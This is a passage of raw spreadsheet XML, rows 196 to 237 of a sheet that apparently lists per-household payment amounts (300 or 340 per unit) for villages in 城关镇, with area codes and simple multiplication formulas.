      <c r="E196" s="14" t="s">
        <v>312</v>
      </c>
      <c r="F196" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G196" s="14">
        <v>2</v>
      </c>
      <c r="H196" s="14">
        <v>300</v>
      </c>
      <c r="I196" s="14">
        <f>H196*G196</f>
        <v>600</v>
      </c>
      <c r="J196" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K196" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="197" ht="23" customHeight="1" spans="1:11">
      <c r="A197" s="13" t="s">
        <v>719</v>
      </c>
      <c r="B197" s="14" t="str">
        <f>B196</f>
        <v>城关镇</v>
      </c>
      <c r="C197" s="14" t="str">
        <f>C196</f>
        <v>东北六组</v>
      </c>
      <c r="D197" s="13" t="s">
        <v>720</v>
      </c>
      <c r="E197" s="13" t="s">
        <v>419</v>
      </c>
      <c r="F197" s="14" t="str">
        <f>F196</f>
        <v>4113210103</v>
      </c>
      <c r="G197" s="14"/>
      <c r="H197" s="14"/>
      <c r="I197" s="14"/>
      <c r="J197" s="14"/>
      <c r="K197" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="198" ht="23" customHeight="1" spans="1:11">
      <c r="A198" s="13" t="s">
        <v>721</v>
      </c>
      <c r="B198" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C198" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D198" s="14" t="s">
        <v>722</v>
      </c>
      <c r="E198" s="14" t="s">
        <v>723</v>
      </c>
      <c r="F198" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G198" s="14">
        <v>2</v>
      </c>
      <c r="H198" s="14">
        <v>300</v>
      </c>
      <c r="I198" s="14">
        <f>H198*G198</f>
        <v>600</v>
      </c>
      <c r="J198" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K198" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="199" ht="23" customHeight="1" spans="1:11">
      <c r="A199" s="13" t="s">
        <v>724</v>
      </c>
      <c r="B199" s="14" t="str">
        <f>B198</f>
        <v>城关镇</v>
      </c>
      <c r="C199" s="14" t="str">
        <f>C198</f>
        <v>中华村</v>
      </c>
      <c r="D199" s="13" t="s">
        <v>725</v>
      </c>
      <c r="E199" s="13" t="s">
        <v>560</v>
      </c>
      <c r="F199" s="14" t="str">
        <f>F198</f>
        <v>4113210108</v>
      </c>
      <c r="G199" s="14"/>
      <c r="H199" s="14"/>
      <c r="I199" s="14"/>
      <c r="J199" s="14"/>
      <c r="K199" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="200" ht="23" customHeight="1" spans="1:11">
      <c r="A200" s="13" t="s">
        <v>726</v>
      </c>
      <c r="B200" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C200" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D200" s="14" t="s">
        <v>727</v>
      </c>
      <c r="E200" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F200" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G200" s="14">
        <v>2</v>
      </c>
      <c r="H200" s="14">
        <v>300</v>
      </c>
      <c r="I200" s="14">
        <f>H200*G200</f>
        <v>600</v>
      </c>
      <c r="J200" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K200" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="201" ht="23" customHeight="1" spans="1:11">
      <c r="A201" s="13" t="s">
        <v>728</v>
      </c>
      <c r="B201" s="14" t="str">
        <f>B200</f>
        <v>城关镇</v>
      </c>
      <c r="C201" s="14" t="str">
        <f>C200</f>
        <v>东北一组</v>
      </c>
      <c r="D201" s="13" t="s">
        <v>729</v>
      </c>
      <c r="E201" s="20" t="s">
        <v>303</v>
      </c>
      <c r="F201" s="14" t="str">
        <f>F200</f>
        <v>4113210103</v>
      </c>
      <c r="G201" s="14"/>
      <c r="H201" s="14"/>
      <c r="I201" s="14"/>
      <c r="J201" s="14"/>
      <c r="K201" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="202" ht="23" customHeight="1" spans="1:11">
      <c r="A202" s="13" t="s">
        <v>730</v>
      </c>
      <c r="B202" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C202" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D202" s="14" t="s">
        <v>731</v>
      </c>
      <c r="E202" s="14" t="s">
        <v>288</v>
      </c>
      <c r="F202" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G202" s="14">
        <v>1</v>
      </c>
      <c r="H202" s="14">
        <v>340</v>
      </c>
      <c r="I202" s="14">
        <f>H202*G202</f>
        <v>340</v>
      </c>
      <c r="J202" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K202" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="203" ht="23" customHeight="1" spans="1:11">
      <c r="A203" s="13" t="s">
        <v>732</v>
      </c>
      <c r="B203" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C203" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D203" s="14" t="s">
        <v>733</v>
      </c>
      <c r="E203" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F203" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G203" s="14">
        <v>2</v>
      </c>
      <c r="H203" s="14">
        <v>300</v>
      </c>
      <c r="I203" s="14">
        <f>H203*G203</f>
        <v>600</v>
      </c>
      <c r="J203" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K203" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="204" ht="23" customHeight="1" spans="1:11">
      <c r="A204" s="13" t="s">
        <v>734</v>
      </c>
      <c r="B204" s="14" t="str">
        <f>B203</f>
        <v>城关镇</v>
      </c>
      <c r="C204" s="14" t="str">
        <f>C203</f>
        <v>西北村</v>
      </c>
      <c r="D204" s="13" t="s">
        <v>735</v>
      </c>
      <c r="E204" s="13" t="s">
        <v>303</v>
      </c>
      <c r="F204" s="14" t="str">
        <f>F203</f>
        <v>4113210106</v>
      </c>
      <c r="G204" s="14"/>
      <c r="H204" s="14"/>
      <c r="I204" s="14"/>
      <c r="J204" s="14"/>
      <c r="K204" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="205" ht="23" customHeight="1" spans="1:11">
      <c r="A205" s="13" t="s">
        <v>736</v>
      </c>
      <c r="B205" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C205" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D205" s="14" t="s">
        <v>737</v>
      </c>
      <c r="E205" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F205" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G205" s="14">
        <v>2</v>
      </c>
      <c r="H205" s="14">
        <v>300</v>
      </c>
      <c r="I205" s="14">
        <f>H205*G205</f>
        <v>600</v>
      </c>
      <c r="J205" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K205" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="206" ht="23" customHeight="1" spans="1:11">
      <c r="A206" s="13" t="s">
        <v>738</v>
      </c>
      <c r="B206" s="14" t="str">
        <f>B205</f>
        <v>城关镇</v>
      </c>
      <c r="C206" s="14" t="str">
        <f>C205</f>
        <v>东北一组</v>
      </c>
      <c r="D206" s="13" t="s">
        <v>739</v>
      </c>
      <c r="E206" s="13" t="s">
        <v>303</v>
      </c>
      <c r="F206" s="14" t="str">
        <f>F205</f>
        <v>4113210103</v>
      </c>
      <c r="G206" s="14"/>
      <c r="H206" s="14"/>
      <c r="I206" s="14"/>
      <c r="J206" s="14"/>
      <c r="K206" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="207" ht="23" customHeight="1" spans="1:11">
      <c r="A207" s="13" t="s">
        <v>740</v>
      </c>
      <c r="B207" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C207" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D207" s="14" t="s">
        <v>741</v>
      </c>
      <c r="E207" s="14" t="s">
        <v>560</v>
      </c>
      <c r="F207" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G207" s="14">
        <v>1</v>
      </c>
      <c r="H207" s="14">
        <v>340</v>
      </c>
      <c r="I207" s="14">
        <f>H207*G207</f>
        <v>340</v>
      </c>
      <c r="J207" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K207" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="208" ht="23" customHeight="1" spans="1:11">
      <c r="A208" s="13" t="s">
        <v>742</v>
      </c>
      <c r="B208" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C208" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D208" s="14" t="s">
        <v>743</v>
      </c>
      <c r="E208" s="14" t="s">
        <v>744</v>
      </c>
      <c r="F208" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G208" s="14">
        <v>1</v>
      </c>
      <c r="H208" s="14">
        <v>340</v>
      </c>
      <c r="I208" s="14">
        <f>H208*G208</f>
        <v>340</v>
      </c>
      <c r="J208" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K208" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="209" ht="23" customHeight="1" spans="1:11">
      <c r="A209" s="13" t="s">
        <v>745</v>
      </c>
      <c r="B209" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C209" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D209" s="14" t="s">
        <v>746</v>
      </c>
      <c r="E209" s="14" t="s">
        <v>373</v>
      </c>
      <c r="F209" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G209" s="14">
        <v>1</v>
      </c>
      <c r="H209" s="14">
        <v>340</v>
      </c>
      <c r="I209" s="14">
        <f>H209*G209</f>
        <v>340</v>
      </c>
      <c r="J209" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K209" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="210" ht="23" customHeight="1" spans="1:11">
      <c r="A210" s="13" t="s">
        <v>747</v>
      </c>
      <c r="B210" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C210" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D210" s="14" t="s">
        <v>748</v>
      </c>
      <c r="E210" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F210" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G210" s="14">
        <v>1</v>
      </c>
      <c r="H210" s="14">
        <v>340</v>
      </c>
      <c r="I210" s="14">
        <f>H210*G210</f>
        <v>340</v>
      </c>
      <c r="J210" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K210" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="211" ht="23" customHeight="1" spans="1:11">
      <c r="A211" s="13" t="s">
        <v>749</v>
      </c>
      <c r="B211" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C211" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D211" s="14" t="s">
        <v>750</v>
      </c>
      <c r="E211" s="14" t="s">
        <v>751</v>
      </c>
      <c r="F211" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G211" s="14">
        <v>2</v>
      </c>
      <c r="H211" s="14">
        <v>300</v>
      </c>
      <c r="I211" s="14">
        <f>H211*G211</f>
        <v>600</v>
      </c>
      <c r="J211" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K211" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="212" ht="23" customHeight="1" spans="1:11">
      <c r="A212" s="13" t="s">
        <v>752</v>
      </c>
      <c r="B212" s="14" t="str">
        <f>B211</f>
        <v>城关镇</v>
      </c>
      <c r="C212" s="14" t="str">
        <f>C211</f>
        <v>中华村</v>
      </c>
      <c r="D212" s="13" t="s">
        <v>753</v>
      </c>
      <c r="E212" s="13" t="s">
        <v>754</v>
      </c>
      <c r="F212" s="14" t="str">
        <f>F211</f>
        <v>4113210108</v>
      </c>
      <c r="G212" s="14"/>
      <c r="H212" s="14"/>
      <c r="I212" s="14"/>
      <c r="J212" s="14"/>
      <c r="K212" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="213" ht="23" customHeight="1" spans="1:11">
      <c r="A213" s="13" t="s">
        <v>755</v>
      </c>
      <c r="B213" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C213" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D213" s="14" t="s">
        <v>756</v>
      </c>
      <c r="E213" s="14" t="s">
        <v>484</v>
      </c>
      <c r="F213" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G213" s="14">
        <v>2</v>
      </c>
      <c r="H213" s="14">
        <v>300</v>
      </c>
      <c r="I213" s="14">
        <f>H213*G213</f>
        <v>600</v>
      </c>
      <c r="J213" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K213" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="214" ht="23" customHeight="1" spans="1:11">
      <c r="A214" s="13" t="s">
        <v>757</v>
      </c>
      <c r="B214" s="14" t="str">
        <f>B213</f>
        <v>城关镇</v>
      </c>
      <c r="C214" s="14" t="str">
        <f>C213</f>
        <v>西北村</v>
      </c>
      <c r="D214" s="13" t="s">
        <v>758</v>
      </c>
      <c r="E214" s="13" t="s">
        <v>288</v>
      </c>
      <c r="F214" s="14" t="str">
        <f>F213</f>
        <v>4113210106</v>
      </c>
      <c r="G214" s="14"/>
      <c r="H214" s="14"/>
      <c r="I214" s="14"/>
      <c r="J214" s="14"/>
      <c r="K214" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="215" ht="23" customHeight="1" spans="1:11">
      <c r="A215" s="13" t="s">
        <v>759</v>
      </c>
      <c r="B215" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C215" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D215" s="14" t="s">
        <v>760</v>
      </c>
      <c r="E215" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F215" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G215" s="14">
        <v>1</v>
      </c>
      <c r="H215" s="14">
        <v>340</v>
      </c>
      <c r="I215" s="14">
        <f t="shared" ref="I215:I221" si="7">H215*G215</f>
        <v>340</v>
      </c>
      <c r="J215" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K215" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="216" ht="23" customHeight="1" spans="1:11">
      <c r="A216" s="13" t="s">
        <v>761</v>
      </c>
      <c r="B216" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C216" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D216" s="14" t="s">
        <v>762</v>
      </c>
      <c r="E216" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F216" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G216" s="14">
        <v>1</v>
      </c>
      <c r="H216" s="14">
        <v>340</v>
      </c>
      <c r="I216" s="14">
        <f t="shared" si="7"/>
        <v>340</v>
      </c>
      <c r="J216" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K216" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="217" ht="23" customHeight="1" spans="1:11">
      <c r="A217" s="13" t="s">
        <v>763</v>
      </c>
      <c r="B217" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C217" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D217" s="14" t="s">
        <v>764</v>
      </c>
      <c r="E217" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F217" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G217" s="14">
        <v>1</v>
      </c>
      <c r="H217" s="14">
        <v>340</v>
      </c>
      <c r="I217" s="14">
        <f t="shared" si="7"/>
        <v>340</v>
      </c>
      <c r="J217" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K217" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="218" ht="23" customHeight="1" spans="1:11">
      <c r="A218" s="13" t="s">
        <v>765</v>
      </c>
      <c r="B218" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C218" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D218" s="14" t="s">
        <v>766</v>
      </c>
      <c r="E218" s="14" t="s">
        <v>767</v>
      </c>
      <c r="F218" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G218" s="14">
        <v>1</v>
      </c>
      <c r="H218" s="14">
        <v>340</v>
      </c>
      <c r="I218" s="14">
        <f t="shared" si="7"/>
        <v>340</v>
      </c>
      <c r="J218" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K218" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="219" ht="23" customHeight="1" spans="1:11">
      <c r="A219" s="13" t="s">
        <v>768</v>
      </c>
      <c r="B219" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C219" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D219" s="14" t="s">
        <v>769</v>
      </c>
      <c r="E219" s="14" t="s">
        <v>584</v>
      </c>
      <c r="F219" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G219" s="14">
        <v>1</v>
      </c>
      <c r="H219" s="14">
        <v>340</v>
      </c>
      <c r="I219" s="14">
        <f t="shared" si="7"/>
        <v>340</v>
      </c>
      <c r="J219" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K219" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="220" ht="23" customHeight="1" spans="1:11">
      <c r="A220" s="13" t="s">
        <v>770</v>
      </c>
      <c r="B220" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C220" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D220" s="14" t="s">
        <v>771</v>
      </c>
      <c r="E220" s="14" t="s">
        <v>249</v>
      </c>
      <c r="F220" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G220" s="14">
        <v>1</v>
      </c>
      <c r="H220" s="14">
        <v>340</v>
      </c>
      <c r="I220" s="14">
        <f t="shared" si="7"/>
        <v>340</v>
      </c>
      <c r="J220" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K220" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="221" ht="23" customHeight="1" spans="1:11">
      <c r="A221" s="13" t="s">
        <v>772</v>
      </c>
      <c r="B221" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C221" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D221" s="14" t="s">
        <v>773</v>
      </c>
      <c r="E221" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F221" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G221" s="14">
        <v>2</v>
      </c>
      <c r="H221" s="14">
        <v>300</v>
      </c>
      <c r="I221" s="14">
        <f t="shared" si="7"/>
        <v>600</v>
      </c>
      <c r="J221" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K221" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="222" ht="23" customHeight="1" spans="1:11">
      <c r="A222" s="13" t="s">
        <v>774</v>
      </c>
      <c r="B222" s="14" t="str">
        <f>B221</f>
        <v>城关镇</v>
      </c>
      <c r="C222" s="14" t="str">
        <f>C221</f>
        <v>中华村</v>
      </c>
      <c r="D222" s="13" t="s">
        <v>775</v>
      </c>
      <c r="E222" s="13" t="s">
        <v>776</v>
      </c>
      <c r="F222" s="14" t="str">
        <f>F221</f>
        <v>4113210108</v>
      </c>
      <c r="G222" s="14"/>
      <c r="H222" s="14"/>
      <c r="I222" s="14"/>
      <c r="J222" s="14"/>
      <c r="K222" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="223" ht="23" customHeight="1" spans="1:11">
      <c r="A223" s="13" t="s">
        <v>777</v>
      </c>
      <c r="B223" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C223" s="14" t="s">
        <v>220</v>
      </c>
      <c r="D223" s="14" t="s">
        <v>778</v>
      </c>
      <c r="E223" s="14" t="s">
        <v>779</v>
      </c>
      <c r="F223" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G223" s="14">
        <v>1</v>
      </c>
      <c r="H223" s="14">
        <v>340</v>
      </c>
      <c r="I223" s="14">
        <f>H223*G223</f>
        <v>340</v>
      </c>
      <c r="J223" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K223" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="224" ht="23" customHeight="1" spans="1:11">
      <c r="A224" s="13" t="s">
        <v>780</v>
      </c>
      <c r="B224" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C224" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D224" s="14" t="s">
        <v>781</v>
      </c>
      <c r="E224" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F224" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G224" s="14">
        <v>2</v>
      </c>
      <c r="H224" s="14">
        <v>300</v>
      </c>
      <c r="I224" s="14">
        <f>H224*G224</f>
        <v>600</v>
      </c>
      <c r="J224" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K224" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="225" ht="23" customHeight="1" spans="1:11">
      <c r="A225" s="13" t="s">
        <v>782</v>
      </c>
      <c r="B225" s="14" t="str">
        <f>B224</f>
        <v>城关镇</v>
      </c>
      <c r="C225" s="14" t="str">
        <f>C224</f>
        <v>中华村</v>
      </c>
      <c r="D225" s="13" t="s">
        <v>783</v>
      </c>
      <c r="E225" s="13" t="s">
        <v>303</v>
      </c>
      <c r="F225" s="14" t="str">
        <f>F224</f>
        <v>4113210108</v>
      </c>
      <c r="G225" s="14"/>
      <c r="H225" s="14"/>
      <c r="I225" s="14"/>
      <c r="J225" s="14"/>
      <c r="K225" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="226" ht="23" customHeight="1" spans="1:11">
      <c r="A226" s="13" t="s">
        <v>784</v>
      </c>
      <c r="B226" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C226" s="14" t="s">
        <v>318</v>
      </c>
      <c r="D226" s="14" t="s">
        <v>785</v>
      </c>
      <c r="E226" s="14" t="s">
        <v>786</v>
      </c>
      <c r="F226" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G226" s="14">
        <v>2</v>
      </c>
      <c r="H226" s="14">
        <v>300</v>
      </c>
      <c r="I226" s="14">
        <f>H226*G226</f>
        <v>600</v>
      </c>
      <c r="J226" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K226" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="227" ht="23" customHeight="1" spans="1:11">
      <c r="A227" s="13" t="s">
        <v>787</v>
      </c>
      <c r="B227" s="14" t="str">
        <f>B226</f>
        <v>城关镇</v>
      </c>
      <c r="C227" s="14" t="str">
        <f>C226</f>
        <v>东北一组</v>
      </c>
      <c r="D227" s="13" t="s">
        <v>788</v>
      </c>
      <c r="E227" s="13" t="s">
        <v>346</v>
      </c>
      <c r="F227" s="14" t="str">
        <f>F226</f>
        <v>4113210103</v>
      </c>
      <c r="G227" s="14"/>
      <c r="H227" s="14"/>
      <c r="I227" s="14"/>
      <c r="J227" s="14"/>
      <c r="K227" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="228" ht="23" customHeight="1" spans="1:11">
      <c r="A228" s="13" t="s">
        <v>789</v>
      </c>
      <c r="B228" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C228" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D228" s="14" t="s">
        <v>790</v>
      </c>
      <c r="E228" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F228" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G228" s="14">
        <v>2</v>
      </c>
      <c r="H228" s="14">
        <v>300</v>
      </c>
      <c r="I228" s="14">
        <f>H228*G228</f>
        <v>600</v>
      </c>
      <c r="J228" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K228" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="229" ht="23" customHeight="1" spans="1:11">
      <c r="A229" s="13" t="s">
        <v>791</v>
      </c>
      <c r="B229" s="14" t="str">
        <f>B228</f>
        <v>城关镇</v>
      </c>
      <c r="C229" s="14" t="str">
        <f>C228</f>
        <v>西北村</v>
      </c>
      <c r="D229" s="13" t="s">
        <v>792</v>
      </c>
      <c r="E229" s="13" t="s">
        <v>239</v>
      </c>
      <c r="F229" s="14" t="str">
        <f>F228</f>
        <v>4113210106</v>
      </c>
      <c r="G229" s="14"/>
      <c r="H229" s="14"/>
      <c r="I229" s="14"/>
      <c r="J229" s="14"/>
      <c r="K229" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="230" ht="23" customHeight="1" spans="1:11">
      <c r="A230" s="13" t="s">
        <v>793</v>
      </c>
      <c r="B230" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C230" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D230" s="14" t="s">
        <v>794</v>
      </c>
      <c r="E230" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F230" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G230" s="14">
        <v>2</v>
      </c>
      <c r="H230" s="14">
        <v>300</v>
      </c>
      <c r="I230" s="14">
        <f>H230*G230</f>
        <v>600</v>
      </c>
      <c r="J230" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K230" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="231" ht="23" customHeight="1" spans="1:11">
      <c r="A231" s="13" t="s">
        <v>795</v>
      </c>
      <c r="B231" s="14" t="str">
        <f>B230</f>
        <v>城关镇</v>
      </c>
      <c r="C231" s="14" t="str">
        <f>C230</f>
        <v>中华村</v>
      </c>
      <c r="D231" s="13" t="s">
        <v>796</v>
      </c>
      <c r="E231" s="13" t="s">
        <v>797</v>
      </c>
      <c r="F231" s="14" t="str">
        <f>F230</f>
        <v>4113210108</v>
      </c>
      <c r="G231" s="14"/>
      <c r="H231" s="14"/>
      <c r="I231" s="14"/>
      <c r="J231" s="14"/>
      <c r="K231" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="232" ht="23" customHeight="1" spans="1:11">
      <c r="A232" s="13" t="s">
        <v>798</v>
      </c>
      <c r="B232" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C232" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D232" s="14" t="s">
        <v>799</v>
      </c>
      <c r="E232" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F232" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G232" s="14">
        <v>1</v>
      </c>
      <c r="H232" s="14">
        <v>340</v>
      </c>
      <c r="I232" s="14">
        <f>H232*G232</f>
        <v>340</v>
      </c>
      <c r="J232" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K232" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="233" ht="23" customHeight="1" spans="1:11">
      <c r="A233" s="13" t="s">
        <v>800</v>
      </c>
      <c r="B233" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C233" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D233" s="14" t="s">
        <v>801</v>
      </c>
      <c r="E233" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F233" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G233" s="14">
        <v>1</v>
      </c>
      <c r="H233" s="14">
        <v>340</v>
      </c>
      <c r="I233" s="14">
        <f>H233*G233</f>
        <v>340</v>
      </c>
      <c r="J233" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K233" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="234" ht="23" customHeight="1" spans="1:11">
      <c r="A234" s="13" t="s">
        <v>802</v>
      </c>
      <c r="B234" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C234" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D234" s="14" t="s">
        <v>803</v>
      </c>
      <c r="E234" s="14" t="s">
        <v>340</v>
      </c>
      <c r="F234" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G234" s="14">
        <v>1</v>
      </c>
      <c r="H234" s="14">
        <v>340</v>
      </c>
      <c r="I234" s="14">
        <f>H234*G234</f>
        <v>340</v>
      </c>
      <c r="J234" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K234" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="235" ht="23" customHeight="1" spans="1:11">
      <c r="A235" s="13" t="s">
        <v>804</v>
      </c>
      <c r="B235" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C235" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D235" s="14" t="s">
        <v>805</v>
      </c>
      <c r="E235" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F235" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G235" s="14">
        <v>2</v>
      </c>
      <c r="H235" s="14">
        <v>300</v>
      </c>
      <c r="I235" s="14">
        <f>H235*G235</f>
        <v>600</v>
      </c>
      <c r="J235" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K235" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="236" ht="23" customHeight="1" spans="1:11">
      <c r="A236" s="13" t="s">
        <v>806</v>
      </c>
      <c r="B236" s="14" t="str">
        <f>B235</f>
        <v>城关镇</v>
      </c>
      <c r="C236" s="14" t="str">
        <f>C235</f>
        <v>北外村</v>
      </c>
      <c r="D236" s="21" t="s">
        <v>807</v>
      </c>
      <c r="E236" s="21" t="s">
        <v>239</v>
      </c>
      <c r="F236" s="14" t="str">
        <f>F235</f>
        <v>4113210102</v>
      </c>
      <c r="G236" s="14"/>
      <c r="H236" s="14"/>
      <c r="I236" s="14"/>
      <c r="J236" s="14"/>
      <c r="K236" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="237" ht="23" customHeight="1" spans="1:11">
      <c r="A237" s="13" t="s">
        <v>808</v>
      </c>
      <c r="B237" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C237" s="14" t="s">
        <v>286</v>
      </c>
